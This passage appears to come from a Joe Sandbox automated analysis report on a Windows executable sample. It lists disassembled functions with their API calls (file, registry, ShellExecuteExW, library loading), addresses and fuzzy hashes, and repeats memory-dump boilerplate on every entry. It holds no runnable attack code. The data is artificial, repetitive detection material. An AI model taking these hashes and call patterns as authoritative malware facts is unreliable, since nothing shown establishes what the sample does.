
Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C

Function 00406935 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
GetProcAddress.KERNEL32(00000000,?), ref: 00406962

Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA

Function 00406031 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 0040600C Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694

Function 00405AEF Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D

Function 004023D7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D

Function 004063DC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674

Function 004060E3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4

Function 004060B4 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4

Function 00402419 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040244A

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction ID: 53345aa50f94a5dbc05c73a67e8aa0b188b477950ab0ef6c1fe412bbc790425e
Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
Instruction Fuzzy Hash: E7E04F3180021AAADB00AFA0CE0ADAD3678AF00304F10493EF510BB0D1E7F889509759

Function 004063AE Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040643C,?,?,?,?,: Completed,?,00000000), ref: 004063D2

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction ID: 160c38975f312424f4866d14917befa5dd24af40cdf73f4d33e28196d90f96f9
Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
Instruction Fuzzy Hash: 44D0123204020EBBDF115E90ED01FAB3B1DAB08350F014426FE06E40A0D775D534A754

Function 004015C8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
Opcode Fuzzy Hash: 505856000b56d662a9aa875b3a3f8f40bf86435686472c5d4cf907b3c1585cba
Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D

Function 0040450C Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D

Function 00405B67 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405B76

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction ID: 080962bbef7e268e86b0d243ececfcd1ad47764945baea7f73af6130fa7b9bd6
Opcode Fuzzy Hash: accb29398adcd6f2598047f0fcddae8b07494e52d9cc9fcafc25c5f5f83f3143
Instruction Fuzzy Hash: A9C092F2100201EFE301CF80CB09F067BE8AF54306F028058E1899A060CB788800CB29

Function 004034D4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503

Memory Dump Source

Source File: 00000000.00000002.1332089974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1332067009.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332106880.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332125955.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1332260790.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_87h216Snb7.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
